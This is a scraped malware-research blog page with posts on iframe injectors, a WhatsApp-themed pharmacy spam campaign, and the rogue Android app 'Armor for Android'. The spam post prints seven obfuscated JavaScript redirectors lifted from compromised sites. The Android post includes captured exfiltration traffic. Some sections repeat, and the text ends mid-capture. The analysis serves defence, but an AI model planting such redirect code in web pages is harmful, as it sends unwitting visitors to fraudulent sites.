Malware at Stake
An Official Malware Research Blog of SecNiche Security Labs. Analysis, straight from the hidden and underground.
Sunday, May 14, 2017
[Virus Bulletin Conference] The TAO of Automated Iframe Injectors - Building Drive-by Platforms For Fun and Profit
In this paper, we present the design of distributed infection model used by attackers to inject malicious iframes on the fly to conduct large scale drive-by download attacks. We use the term “Iframe Injectors” which refers to the automated tools used by attackers to trigger mass infections. The Iframe Injectors can either be standalone tools or embedded components as a part of the botnets. We discuss the classification of Iframe Injectors and dissect a number of existing tools to understand their functionalities and how they are deployed effectively.
Iframes are inline frames, which are HTML objects that are embedded in a web page to fetch content (HTML or JavaScript) from a third-party domain. The content is treated as a part of the primary web page and is served when that web page is accessed. This is a known HTML functionality and is heavily used for content sharing among multiple domains. However, attackers abuse this functionality in multiple variants of drive-by download attacks as a part of massive iframe infection campaigns. An attack starts with a malicious domain that hosts malware. The attackers then embed a URL referencing the malware in an iframe and place that in a compromised website (or any other self-managed website). Users are then coerced into visiting the web page that has the iframe embedded in it. When the user visits the page, the malware is fetched from the malicious domain and the end-user system is infected.
For complete details, the paper is available here: https://www.virusbulletin.com/virusbulletin/2016/10/tao-automated-iframe-injectors-building-driveby-platforms-fun-and-profit/
PDF is available here: https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Sood-Bansal.pdf
Tuesday, September 29, 2015
[Updated] Nurturing JavaScript Obfuscation and Fast Flux DNS - "Whats App Voicemail Spamming" for Russian Online Pharmacies!
Recently, we analyzed that spammers are doing "Whats App Fake Voicemail" spamming to trick end-users to visit online pharmacies' websites. There are high chances that malware can be downloaded on to the end-user systems visiting these spamming websites. However, during this analysis, we did not notice that behavior.
The trend of "Whats App Fake Voicemail" spamming messages is not new as we have been encountering these spamming activities for last few years. There are not significant changes in the methods of sending "Whats App Fake Voicemail" notification messages which are used to lure end-users to visit illegitimate domains. However from security research perspective, the target is to understand how this spamming attack is carried at the backend. Since the "Whats App" organization brand is treated as a bait, as a result of which, there are high chances that people will click the links in the notification emails. This spamming attack is targeted against broad set of users on the Internet in order to redirect them to the online pharmacies' outlets managed by Russian cyber actors. Check more on online pharmacies monetary model here : https://en.wikipedia.org/wiki/Online_pharmacy
Let's perform the analysis. The end-user receives the email notification for "Whats App Fake Voicemail" message as follows:
When end-user clicks the domain it is redirected to the malicious domain that serves following HTTP response headers as shown below. The landing web pages are hosted on Wordpress portal which looks like to be a compromised website. Let's take a close look on the HTTP response headers.
GET /wp-content/themes/eStore/epanel/page_templates/js/educating.php HTTP/1.1
Host pasarjagakarsa.com
User-Agent Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Connection keep-alive
(Status-Line) HTTP/1.1 404 Not Found
Server nginx
Date Tue, 29 Sep 2015 19:32:40 GMT
Content-Type text/html
Transfer-Encoding chunked
Connection keep-alive
Vary Accept-Encoding
X-Powered-By PHP/5.4.44
Content-Encoding gzip
If you see the highlighted part in the HTTP response headers, it shows "404 Not Found" error which generally means resource does not exist on the web server. Infact it is not true, the web server responded back with following content as a part of web page.
[Updates]
All the information and orders are actually handled by this primary outlet - hxxps://checkoutucxefvfq. fastcheckoutrx.com/
Stay Secure !
The trend of "Whats App Fake Voicemail" spamming messages is not new as we have been encountering these spamming activities for last few years. There are not significant changes in the methods of sending "Whats App Fake Voicemail" notification messages which are used to lure end-users to visit illegitimate domains. However from security research perspective, the target is to understand how this spamming attack is carried at the backend. Since the "Whats App" organization brand is treated as a bait, as a result of which, there are high chances that people will click the links in the notification emails. This spamming attack is targeted against broad set of users on the Internet in order to redirect them to the online pharmacies' outlets managed by Russian cyber actors. Check more on online pharmacies monetary model here : https://en.wikipedia.org/wiki/Online_pharmacy
Let's perform the analysis. The end-user receives the email notification for "Whats App Fake Voicemail" message as follows:
When end-user clicks the domain it is redirected to the malicious domain that serves following HTTP response headers as shown below. The landing web pages are hosted on Wordpress portal which looks like to be a compromised website. Let's take a close look on the HTTP response headers.
GET /wp-content/themes/eStore/epanel/page_templates/js/educating.php HTTP/1.1
Host pasarjagakarsa.com
User-Agent Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Connection keep-alive
(Status-Line) HTTP/1.1 404 Not Found
Server nginx
Date Tue, 29 Sep 2015 19:32:40 GMT
Content-Type text/html
Transfer-Encoding chunked
Connection keep-alive
Vary Accept-Encoding
X-Powered-By PHP/5.4.44
Content-Encoding gzip
If you see the highlighted part in the HTTP response headers, it shows "404 Not Found" error which generally means resource does not exist on the web server. Infact it is not true, the web server responded back with following content as a part of web page.
Before going further, check our earlier articles on JavaScript de-obfuscation
- http://secniche.blogspot.com/2012/04/javascript-obfuscation-manual-armor-1.html
- http://secniche.blogspot.com/2012/04/javascript-obfuscation-manual-armor-2.html
- http://secniche.blogspot.com/2011/04/javascript-camouflaging-primer.html
If you notice, the web page has an obfuscated JavaScript embedded in it. Let's extract the obfuscated JavaScript as shown below:
The obfuscated JS is not that complex and it can be de-obfuscated easily. On de-obfuscation it was observed that the user's browser was further redirected to the following domain: "hxxp://magicorganicmarket.ru" as shown below:
Due to misconfiguration on the landing domain:"hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/educating.php" , the directory listing was obtained as follows:
Several other malicious links with obfuscated JavaScripts were obtained and presented as follows:
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/chatterer.php
function celle() { cella=72; cellb=[191,177,182,172,183,191,118,188,183,184,118,180,183,171,169,188,177,183,182,118,176,186,173,174,133,111,176,188,188,184,130,119,119,182,169,188,189,186,169,180,176,173,186,170,187,183,189,188,180,173,188,118,186,189,111,131]; cellc=""; for(celld=0;celld<cellb.length;celld++) { cellc+=String.fromCharCode(cellb[celld]-cella); } return cellc; } setTimeout(celle(),1306);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://naturalherbsoutlet.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/elimination.php
function sicklee() { sicklea=42; sickleb=[161,147,152,142,153,161,88,158,153,154,88,150,153,141,139,158,147,153,152,88,146,156,143,144,103,81,146,158,158,154,100,89,89,145,143,152,143,156,147,141,139,147,142,141,153,151,154,139,152,163,88,156,159,81,101]; sicklec=""; for(sickled=0;sickled<sickleb.length;sickled++) { sicklec+=String.fromCharCode(sickleb[sickled]-sicklea); } return sicklec; } setTimeout(sicklee(),1276);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://genericaidcompany.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/fresnel.php
function timee() { timea=58; timeb=[177,163,168,158,169,177,104,174,169,170,104,166,169,157,155,174,163,169,168,104,162,172,159,160,119,97,162,174,174,170,116,105,105,167,159,158,163,157,155,166,173,155,160,159,173,159,172,176,163,157,159,173,104,172,175,97,117]; timec=""; for(timed=0;timed<timeb.length;timed++) { timec+=String.fromCharCode(timeb[timed]-timea); } return timec; } setTimeout(timee(),1292);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://medicalsafeservices.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/sensitive.php
function risee() { risea=80; riseb=[199,185,190,180,191,199,126,196,191,192,126,188,191,179,177,196,185,191,190,126,184,194,181,182,141,119,184,196,196,192,138,127,127,192,181,194,182,181,179,196,184,181,194,178,195,199,181,178,189,177,194,196,126,194,197,119,139]; risec=""; for(rised=0;rised<riseb.length;rised++) { risec+=String.fromCharCode(riseb[rised]-risea); } return risec; } setTimeout(risee(),1314);Online Pharmacy Website after De-obfuscating JS Code: hxxp://perfectherbswebmart.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php
function likede() { likeda=62; likedb=[181,167,172,162,173,181,108,178,173,174,108,170,173,161,159,178,167,173,172,108,166,176,163,164,123,101,166,178,178,174,120,109,109,173,172,170,167,172,163,176,163,171,163,162,183,180,159,170,179,163,108,176,179,101,121]; likedc=""; for(likedd=0;likedd<likedb.length;likedd++) { likedc+=String.fromCharCode(likedb[likedd]-likeda); } return likedc; } setTimeout(likede(),1296);Online Pharmacy Website after De-obfuscating JS Code: hxxp://onlineremedyvalue.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php
function politye() { politya=38; polityb=[157,143,148,138,149,157,84,154,149,150,84,146,149,137,135,154,143,149,148,84,142,152,139,140,99,77,142,154,154,150,96,85,85,148,135,154,155,152,135,146,150,143,146,146,147,135,146,146,84,152,155,77,97]; polityc=""; for(polityd=0;polityd<polityb.length;polityd++) { polityc+=String.fromCharCode(polityb[polityd]-politya); } return polityc; } setTimeout(politye(),1272);Online Pharmacy Website after De-obfuscating JS Code: hxxp://naturalpillmall.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php
function travellere() { travellera=56; travellerb=[175,161,166,156,167,175,102,172,167,168,102,164,167,155,153,172,161,167,166,102,160,170,157,158,117,95,160,172,172,168,114,103,103,160,157,170,154,153,164,160,167,172,168,173,170,155,160,153,171,157,102,170,173,95,115]; travellerc=""; for(travellerd=0;travellerd<travellerb.length;travellerd++) { travellerc+=String.fromCharCode(travellerb[travellerd]-travellera); } return travellerc; } setTimeout(travellere(),1290);Online Pharmacy Website after De-obfuscating JS Code: hxxp://herbalhotpurchase.ru/
[Updates]
All the information and orders are actually handled by this primary outlet - hxxps://checkoutucxefvfq.
We performed tests at the network level to understand on how the name servers were configured and we found that DNS fluxing was used in this campaign. The Time-To-Live (TTL) field is set for 600 seconds and after the IP address of the domain changes.
Here is an example:
perfectherbswebmart.ru. 600 IN A 82.199.121.167
perfectherbswebmart.ru. 600 IN A 198.144.158.52
Some analytical points for consideration:
- Overall extensive ".ru" domains have been used in this spamming campaign.
- One can conclude that automated spam-code generation tools have been used in this campaign to ease out the process of large scale infection
- For example:- infecting PHP pages with JavaScript obfuscated code hosted on the compromised websites
- The campaign looks like to be executed at an extensive level considering the artefacts.
- Many similar instances of JavaScript obfuscation have been analyzed as presented above
- A number of online pharmacy websites found after de-obfuscating the JavaScript:
- hxxp://herbalhotpurchase.ru/
- hxxp://naturalpillmall.ru/
- hxxp://onlineremedyvalue.ru/
- hxxp://perfectherbswebmart.ru/
- hxxp://medicalsafeservices.ru/
- hxxp://genericaidcompany.ru/
- hxxp://naturalherbsoutlet.ru/
- We believe that this is just the tip of the iceberg and there will be many more
We won't be surprised if the same tactics are used for drive-by download instead of spamming in particular.
Note: At the time of drafting this post, all the websites were active.
Stay Secure !
Monday, May 11, 2015
"Armor for Android" - Rogue Marketing but Real Business - Who Cares for Ethics !
Malvertisements and Fake AVs Outline: Since Android is an open-source mobile platform, it is targeted by attackers for malicious purposes. Android applications are served through malicious advertisements. One of the widely used technique is to raise fake anti-virus alerts in the form of advertisements and then providing a fake solution in the form of anti-virus application which is basically nothing but a malicious application designed either to steal information or asking for some ransom or asking for money to activate the license of fake anti-virus. One or the other way, information or money is desired from the end-users by selling "risk or threat" through malicious advertisements. All of this is fake but the end-users who are not knowledgeable fall for this trap and end up either providing money or information.
Interestingly, businesses are also using the nefarious tactics to scare the users to install applications through dubious means. Read this for the reality of "Android for Armor" http://www.androidauthority.com/armor-for-android-342192/. Several outlets call "Armor for Android" application as rogue. Interestingly, "Android for Armor" built its business using information provided by VirusTotal.com as highlighted here by the Naked Security blog post - https://nakedsecurity.sophos.com/2013/01/10/a-chink-in-android-armour/. Even the virus-total now considered this application as malicious - https://www.virustotal.com/en/file/af518ec81e4ddb7b08048b7924c7f63e55c654a702f5c62ebf3e83d39c51bab2/analysis/1430705447/
We have been watching this trend for couple of months and thought to do a brief analysis of this complete process. We still treat this application as fake or rogue based on the methods use to install Android application on the end-users' phones.
Let's take a look at the recent malicious advertisement campaign for installing "Armor for Android", a so-called authentic application which is advertised to provide effective anti-virus services. Amazingly, "Armor for Android" is still rolling in the market despite of such bad business practices and latest campaign is discussed in this post. The questions that need critical thinking are:
Step 1: The landing website generates an error notification as shown below and highlights that users's Galaxy Nexus phone is infected.
Step 2: After accepting the notification, it is highlighted that underlined system is infected with "Hornyworm.apk".
The application looks like as shown below and it asks for user's credit or debit card information in order to conduct transaction so that fake anti-virus application can be installed after getting a license. Its all basically a fake process.
Assets Information:
parameters.json {
"bugsense_key": "f75779a2",
"analytics_key": "01c0994d555ea19e1ef7e0e5b69c9dab",
"security_key": "ca9u",
"quick_scan": "true",
"device_threats": "false"
}
version.json {
"configuration": "1983",
"pop": "1",
"version": "release-search",
"strat": "2",
"page": "aa.matt.5svp.0830",
"split": "c9c82b85.control",
"ccrule": "fcc98f53",
"offer": "aa.gi.default",
"product": "anti-virus",
"partner": "afacom",
"country": "xx",
"language": "en",
"pool": "9d05eb72",
"affid": "10027",
"v_campaign": "yd447a9ysnrwv44b2m8p97au545hqbpnqrqv",
"subid": "dAF08D9FUE813PVJ0PNAMH6O",
"shortcut": "aa.aff",
"ipcc": "us",
"iprc": "ca",
"xsid": "FyY0MUJgP0-AitmpO62mVw",
"ccconfigid": "a29869e5.140812"
}
Read/Write Operations are shown below:
write /data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml|
read /data/data/com.android.music/shared_prefs/Music.xml|
write /data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml|
write /data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml|
read /data/data/com.android.browser/shared_prefs/com.android.browser_preferences.xml|
read /data/data/com.android.mms/shared_prefs/_has_set_default_values.xml|
read /data/data/com.android.mms/shared_prefs/com.android.mms_preferences.xml|
Device ID submitted as follow:
POST /api/submit?deviceId=d3rqs2c37m&version=349 HTTP/1.1
Content-Type: application/json; charset=utf-8
User-Agent: Dalvik/1.4.0 (Linux; U; Android 2.3.4; generic Build/GRJ22)
Host: url.armorforandroid.net
Connection: Keep-Alive
Content-Length: 641
Accept-Encoding: gzip
Data Exfiltration:
POST /innilytics/upload/01c0994d555ea19e1ef7e0e5b69c9dab HTTP/1.1
Content-Type: application/x-gzip
Content-Length: 1558
Host: innilytics.cloudapp.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
...........WYo.7.~....,
..\.~..&h.6
.&@Q..Oy.=.=....{g.R".).......c...o.O|........a\.,......M,.....
A...."pbyH.q.t*`...).J.R.r.........3.;...i./...
}W.M....?.........&.".eP*D.Tp..%<51...$]`.J.4OV)Zp....pL....i:p..m.+....}."/Y..=o......Q@.:G.@.KW@.V.n<
!J..6<*o.g...;].2.\.ESA.....'^R....:..k.#;...4k.c.,ep1#..2Zf".IE..+.7.:..z..t.1..e...3.5.......1...v.k......|..
Z..Y.y..2.2&..eID...Pz.z...L.0...R.......x........./..q.=...AK......l$.)C<-D..K....Z..p.x.1.....R....B.x..\.~..v...a..<x.{.g....v.k.k..o.>u....!....k..a"..m..&..(1.C.l..;....w5...j< yot.....r....5..,..l.n...f2G.C.v.@..r........F..&.B...#...H..
SWU.6c...C.-.g.!.=.9..O...<y.X3...S....O..?.......V[,.u..[s=......h..(;I!....../.1
....5..y.5..&D7m...c?...m'.p.......v=..#......y.isZ.}........iNVl...@.< }.l.\....j./j..K.....Yq.9.\..m.X.o.K7l.T......o.n.}...[w.f<d6.Z.s]o.*....(O..w..L...v.d......Y..~.gH...Q...3.....5...Tq@...9
..x.!..[h.x_.."7.j.f..h...K)...............8...0y\.-..]
..>h.{....?X...P?.9..]....d........N)(..2.o......_.O/.n.SrZ.....h^]...^......V.....q..........c..e...?x>..l6.ztS..L^.?..Uk.....F. ...95...9..-b...L
.d..l.uc....V....|ys...;.@...1..l...*ZOx.4.X...u......mf..N..5..
..].#).Y..G}..........vy......>C>..B..... .4.8..1!.B..(.."...........1.;..+..`....=Q..._A....G.....>E[....#._...P.?.......q.g.f.C.J ...Wq..UP....H...........fy4.........(:......-^....d......AJW.D{...(..........x....x....+.....(...jI........J"....F$..O..~j.z.|......[..Gv.E9z..........P.P l"$3D..z.m.t..d.}....~...._G$..oV..@..[.Z.....9..E...r..x..y~..Un....,.%3`N.R..J..\".%.... 0S."(q.ER......v......
HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 04 May 2015 01:36:51 GMT
Content-Length: 0
Virus Total - https://www.virustotal.com/en/file/af518ec81e4ddb7b08048b7924c7f63e55c654a702f5c62ebf3e83d39c51bab2/analysis/1430705447/
At the time of this post, the link is still active : hxxp://www.cellphoneupdated.com/fatalvirus/us/106/index.php?countryname=United%20States&model=Galaxy%20Nexus&brand=Samsung&isp=Nobis%20Technology%20Group%2C%20LLC&voluumdata=vid..00000003-87e9-496c-8000-000000000000__vpid..5226a000-bf41-11e4-8376-93ef5ad96b35__caid..a88aabcb-264f-46ba-9801-a85f36f00867__lid..1b71b07a-7436-46e5-981f-f6273dfbcbb5__rt..DJ__oid1..4e28fd07-1e86-4ea9-9d0e-bdcfc0d9ffd1__var1..U
Beware of these kinds of applications !
Interestingly, businesses are also using the nefarious tactics to scare the users to install applications through dubious means. Read this for the reality of "Android for Armor" http://www.androidauthority.com/armor-for-android-342192/. Several outlets call "Armor for Android" application as rogue. Interestingly, "Android for Armor" built its business using information provided by VirusTotal.com as highlighted here by the Naked Security blog post - https://nakedsecurity.sophos.com/2013/01/10/a-chink-in-android-armour/. Even the virus-total now considered this application as malicious - https://www.virustotal.com/en/file/af518ec81e4ddb7b08048b7924c7f63e55c654a702f5c62ebf3e83d39c51bab2/analysis/1430705447/
We have been watching this trend for couple of months and thought to do a brief analysis of this complete process. We still treat this application as fake or rogue based on the methods use to install Android application on the end-users' phones.
Let's take a look at the recent malicious advertisement campaign for installing "Armor for Android", a so-called authentic application which is advertised to provide effective anti-virus services. Amazingly, "Armor for Android" is still rolling in the market despite of such bad business practices and latest campaign is discussed in this post. The questions that need critical thinking are:
- Is there any value in ethical business models in online advertisements?
- How can we obtain users' trust if rogue business tactics are used?
Step 1: The landing website generates an error notification as shown below and highlights that users's Galaxy Nexus phone is infected.
Step 2: After accepting the notification, it is highlighted that underlined system is infected with "Hornyworm.apk".
Step 3: After a time interval of few seconds, a fake message appears which shows that the user's Android phone is in scanning phase and it offers a solution to download an anti-virus application.
Step 4: After a few seconds, an Android application is served as follows:
Step 5: The website also shows how exactly the application needs to be installed.
The complete HTTP network flow is presented below to show various websites that are hopped by the end-user's Android phone.
02:02:34.141 2.050 734 1383 GET 200 text/html http://www.cellphoneupdated.com/fatalvirus/us/106/index.php?countryname=United%20States&model=Galaxy%20Nexus&brand=Samsung&isp=Nobis%20Technology%20Group%2C%20LLC&voluumdata=vid..00000003-87e9-496c-8000-000000000000__vpid..5226a000-bf41-11e4-8376-93ef5ad96b35__caid..a88aabcb-264f-46ba-9801-a85f36f00867__lid..1b71b07a-7436-46e5-981f-f6273dfbcbb5__rt..DJ__oid1..4e28fd07-1e86-4ea9-9d0e-bdcfc0d9ffd1__var1..U
02:02:36.216 0.056 749 (1965) GET (Cache) application/x-javascript http://www.cellphoneupdated.com/fatalvirus/us/106/backfix.min.js
02:03:39.010 0.020 805 (82) GET (Cache) text/html http://www.cellphoneupdated.com/fatalvirus/us/106/blank.html
02:03:39.772 0.060 897 (214) GET 304 text/html http://www.cellphoneupdated.com/fatalvirus/us/106/blank.html?HistoryLoad
02:03:43.045 2.351 947 222 GET 200 text/html http://track.cellphoneupdated.com/click
02:03:45.492 2.083 657 625 GET 200 text/html http://1nxoz.redirectvoluum.com/redirect?target=http%3A%2F%2Fhop.armorforandroid.net%2Fgo%2Faa.aff%3Faffid%3D10027%26v_campaign%3Dyd447a9ysnrwv44b2m8p97au545hqbpnqrqv%26subid%3DdQ31FAIBI19DCGGI0DIHGN46&ts=1425257252676&hash=zuiF0czwgopTMlbFFybUElFtRrEzh08G4HY3fKQ%2FH%2FQ%3D&rm=DJ
02:03:47.618 2.253 749 846 GET 302 Redirect to: http://www.fastermobile.org/v3e/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812 http://hop.armorforandroid.net/go/aa.aff?affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46
02:03:49.959 0.148 1028 215 GET 303 Redirect to: /k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812 http://www.fastermobile.org/v3e/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:03:50.154 0.113 1090 3072 GET 200 text/html http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:03:50.293 0.145 864 1025 GET 200 text/css http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/a.css
02:03:50.312 0.046 877 (0) GET (Cache) application/javascript http://cdnjs.cloudflare.com/ajax/libs/zepto/1.1.4/zepto.min.js
02:03:50.330 0.232 879 891 GET 200 image/png http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/z.png
02:03:50.473 0.144 837 455 GET 200 application/x-javascript http://antivirus.trafficmanager.net/threatCount?range=7&callback=jsonp1&_=1425257258028
02:03:50.498 0.252 799 226 GET 200 application/javascript http://api.handsetdetection.com/sites/js/32266.js
02:03:50.525 0.285 877 167 GET 204 text/plain http://pixel.sitescout.com/iap/14b1248479c050b7
02:03:50.563 0.165 506 824 GET 200 image/png http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/p.png
02:03:50.583 0.370 539 35219 GET 200 application/x-font-ttf http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/font.ttf
02:03:54.517 0.178 1278 2382 GET 200 text/html http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/i.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:03:54.738 0.151 861 1085 GET 200 text/css http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/aa.css
02:03:54.757 0.031 873 (0) GET (Cache) application/javascript http://cdnjs.cloudflare.com/ajax/libs/zepto/1.1.4/zepto.min.js
02:03:54.924 0.056 787 (1560) GET (Cache) application/x-javascript http://connect.facebook.net/en_US/fbds.js
02:03:54.950 0.240 873 167 GET 204 text/plain http://pixel.sitescout.com/iap/0770a2fc94ca2cbc
02:03:55.018 2.176 2106 334 POST 200 image/gif https://www.facebook.com/tr/
02:03:57.279 2.584 1205 3.2M GET 200 application/vnd.android.package-archive http://dlhub1.com/download/full?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:04:05.722 0.165 507 14521 GET 200 image/png http://www.fastermobile
.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/x.png
The application looks like as shown below and it asks for user's credit or debit card information in order to conduct transaction so that fake anti-virus application can be installed after getting a license. Its all basically a fake process.
Assets Information:
parameters.json {
"bugsense_key": "f75779a2",
"analytics_key": "01c0994d555ea19e1ef7e0e5b69c9dab",
"security_key": "ca9u",
"quick_scan": "true",
"device_threats": "false"
}
version.json {
"configuration": "1983",
"pop": "1",
"version": "release-search",
"strat": "2",
"page": "aa.matt.5svp.0830",
"split": "c9c82b85.control",
"ccrule": "fcc98f53",
"offer": "aa.gi.default",
"product": "anti-virus",
"partner": "afacom",
"country": "xx",
"language": "en",
"pool": "9d05eb72",
"affid": "10027",
"v_campaign": "yd447a9ysnrwv44b2m8p97au545hqbpnqrqv",
"subid": "dAF08D9FUE813PVJ0PNAMH6O",
"shortcut": "aa.aff",
"ipcc": "us",
"iprc": "ca",
"xsid": "FyY0MUJgP0-AitmpO62mVw",
"ccconfigid": "a29869e5.140812"
}
Read/Write Operations are shown below:
write /data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml|
read /data/data/com.android.music/shared_prefs/Music.xml|
write /data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml|
write /data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml|
read /data/data/com.android.browser/shared_prefs/com.android.browser_preferences.xml|
read /data/data/com.android.mms/shared_prefs/_has_set_default_values.xml|
read /data/data/com.android.mms/shared_prefs/com.android.mms_preferences.xml|
Device ID submitted as follow:
POST /api/submit?deviceId=d3rqs2c37m&version=349 HTTP/1.1
Content-Type: application/json; charset=utf-8
User-Agent: Dalvik/1.4.0 (Linux; U; Android 2.3.4; generic Build/GRJ22)
Host: url.armorforandroid.net
Connection: Keep-Alive
Content-Length: 641
Accept-Encoding: gzip
Data Exfiltration:
POST /innilytics/upload/01c0994d555ea19e1ef7e0e5b69c9dab HTTP/1.1
Content-Type: application/x-gzip
Content-Length: 1558
Host: innilytics.cloudapp.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
...........WYo.7.~....,
..\.~..&h.6
.&@Q..Oy.=.=....{g.R".).......c...o.O|........a\.,......M,.....
A...."pbyH.q.t*`...).J.R.r.........3.;...i./...
}W.M....?.........&.".eP*D.Tp..%<51...$]`.J.4OV)Zp....pL....i:p..m.+....}."/Y..=o......Q@.:G.@.KW@.V.n<
!J..6<*o.g...;].2.\.ESA.....'^R....:..k.#;...4k.c.,ep1#..2Zf".IE..+.7.:..z..t.1..e...3.5.......1...v.k......|..
Z..Y.y..2.2&..eID...Pz.z...L.0...R.......x........./..q.=...AK......l$.)C<-D..K....Z..p.x.1.....R....B.x..\.~..v...a..<x.{.g....v.k.k..o.>u....!....k..a"..m..&..(1.C.l..;....w5...j< yot.....r....5..,..l.n...f2G.C.v.@..r........F..&.B...#...H..
SWU.6c...C.-.g.!.=.9..O...<y.X3...S....O..?.......V[,.u..[s=......h..(;I!....../.1
....5..y.5..&D7m...c?...m'.p.......v=..#......y.isZ.}........iNVl...@.< }.l.\....j./j..K.....Yq.9.\..m.X.o.K7l.T......o.n.}...[w.f<d6.Z.s]o.*....(O..w..L...v.d......Y..~.gH...Q...3.....5...Tq@...9
..x.!..[h.x_.."7.j.f..h...K)...............8...0y\.-..]
